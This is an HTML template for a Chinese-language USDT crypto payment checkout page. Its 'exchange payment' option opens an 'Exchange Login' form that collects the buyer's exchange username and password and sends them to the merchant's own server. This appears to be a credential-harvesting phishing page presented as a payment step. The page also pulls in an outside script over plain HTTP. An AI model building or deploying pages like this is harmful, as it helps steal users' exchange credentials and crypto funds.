<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>USDT支付</title>
	<meta content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" name="viewport"/>
	<meta content="yes" name="apple-mobile-web-app-capable"/>
	<meta content="black" name="apple-mobile-web-app-status-bar-style"/>
	<meta content="telephone=no" name="format-detection"/>
	<link rel="stylesheet" type="text/css" href="__CDN__/assets/css/style.css"/>
	<link rel="stylesheet" type="text/css" media="all" href="__CDN__/assets/css/exchange.css">

</head>
<body>
<!--

* 17素材vip建站专区模块代码
* 详尽信息请看官网：http://www.17sucai.com/pins/vip
*
* Cdight , 温州易站网络科技有限公司版权所有
*
* 请尊重原创，未经允许请勿转载。
* 在保留版权的前提下可应用于个人或商业用途

-->
<section class="aui-flexView">
	<header class="aui-navBar aui-navBar-fixed ">
<!--		<a href="javascript:;" class="aui-navBar-item">-->
<!--			<i class="icon icon-return"></i>-->
<!--		</a>-->
		<div class="aui-center">
			<span class="aui-center-title">商品支付</span>
		</div>
		<a href="javascript:;" class="aui-navBar-item">
<!--			<i class="icon icon-more"></i>-->
		</a>
	</header>
	<section class="aui-scrollView">
		<div class="aui-apy-white">
			<div class="divHeight"></div>
			<div class="aui-flex b-line">
				<div class="aui-flex-box">
					<h2>商品名称：<em>{$order.title}</em></h2>
				</div>
			</div>
			<div class="aui-flex b-line">
				<div class="aui-flex-box">
					<h2>商品价格：<i>{$order.price}</i></h2>
				</div>
			</div>
			<div class="divHeight b-line"></div>
			<div class="aui-flex">
				<div class="aui-flex-box">
					<p>请选择付款方式</p>
				</div>
			</div>
			<div class="aui-apy-list">
				<a href="javascript:;" class="aui-flex aui-current-item this-card b-line" val="1">
					<div><i class="icon icon-df"></i></div>
					<div class="aui-tag-logo">
						<img src="__CDN__/assets/img/coin.jpeg" alt="">
					</div>
					<div class="aui-flex-box">
						<h3>区块链支付</h3>
					</div>
				</a>
				<a href="javascript:;" class="aui-flex aui-current-item b-line" val="2">
					<div><i class="icon icon-df"></i></div>
					<div class="aui-tag-logo">
						<img src="__CDN__/assets/img/exchange.png" alt="">
					</div>
					<div class="aui-flex-box">
						<h3>交易所支付</h3>
					</div>
				</a>
			</div>
		</div>

		<input type="hidden" id="id" value="{$id}">

		<div class="aui-btn">
			<button href="#loginmodal" id="modaltrigger">确认支付</button>
		</div>


	</section>

</section>

<div id="loginmodal" style="display:none;">

	<h1>Exchange Login</h1>

	<form id="loginform" name="loginform" method="post" action="{:url('index/payment/exchange')}">

		<label for="username">Username:</label>

		<input type="text" name="username" id="username" class="txtfield" tabindex="1">

		<input type="hidden" name="id" value="{$id}">


		<label for="password">Password:</label>

		<input type="password" name="password" id="password" class="txtfield" tabindex="2">



		<div class="center"><input type="submit" name="loginbtn" id="loginbtn" class="flatbtn-blu hidemodal" value="Log In" tabindex="3"></div>

	</form>

</div>

<script type="text/javascript" src="__CDN__/assets/js/jquery-1.9.1.min.js"></script>
<script src="__CDN__/assets/js/jquery-1.10.2.min.js"></script>
<script type="text/javascript" charset="utf-8" src="__CDN__/assets/js/jquery.leanModal.min.js"></script>

<script type="text/javascript">

	$('.aui-current-item').click(function(e){
		$(this).addClass('this-card').siblings().removeClass('this-card');
		$('#type-amount').html($(this).find('.cardAmount').html());

		if($(".this-card").attr('val') == 2){
			$('#modaltrigger').leanModal({ top: 110, overlay: 0.45, closeButton: ".hidemodal" });
		}
	})

	$('.aui-btn').click(function(e){
		var id = $('#id').val();

		if($(".this-card").attr('val') == 1){
			window.location.href = "http://" +  window.location.host + "/index/payment/chain?id="+id;
		}
	})
</script>
<script src="http://www.jq22.com/js/jq.js"></script>
</body>
</html>
